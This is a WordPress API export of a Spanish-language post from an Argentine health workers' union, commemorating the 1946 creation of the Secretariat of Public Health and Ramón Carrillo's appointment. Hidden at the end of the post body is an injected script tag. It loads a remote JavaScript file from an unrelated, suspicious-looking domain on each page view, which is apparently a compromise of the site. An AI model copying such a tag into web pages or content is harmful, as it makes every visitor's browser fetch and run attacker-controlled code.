{"id":18478,"date":"2025-05-23T00:00:00","date_gmt":"2025-05-23T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18478"},"modified":"2026-02-02T17:05:42","modified_gmt":"2026-02-02T20:05:42","slug":"dia-de-la-creacion-de-la-secretaria-de-salud-publica-3","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/dia-de-la-creacion-de-la-secretaria-de-salud-publica-3\/","title":{"rendered":"D\u00eda de la creaci\u00f3n de la Secretar\u00eda de Salud P\u00fablica"},"content":{"rendered":"\n<p>El 23 de mayo de 1946, por decreto N.\u00ba 14.807 del Gobierno Nacional, fue creada la Secretar\u00eda de Salud P\u00fablica. Dicho documento otorgaba jerarqu\u00eda de Ministro al nuevo Secretario y dictamin\u00f3 que sus actos ser\u00edan refrendados por el Ministerio del Interior.<\/p>\n\n\n\n<p>En tanto, unos d\u00edas despu\u00e9s, el 29 de mayo se design\u00f3 a Ram\u00f3n Carrillo, el primer m\u00e9dico sanitarista que realiz\u00f3 un estudio integral de los problemas de salud del pa\u00eds.<\/p>\n\n\n\n<p>Apodado \u201cEl negro\u201d, Carillo dedic\u00f3 su vida a servir al pueblo y a sacar a los hospitales de sus muros, marcando as\u00ed un antes y un despu\u00e9s en la salud p\u00fablica argentina.<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos #SecretariaDeSaludP\u00fablica<\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>El 23 de mayo de 1946, por decreto N.\u00ba 14.807 del Gobierno Nacional, fue creada&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18479,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18478","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18478","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18478"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18478\/revisions"}],"predecessor-version":[{"id":20808,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18478\/revisions\/20808"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18479"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18478"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18478"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18478"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}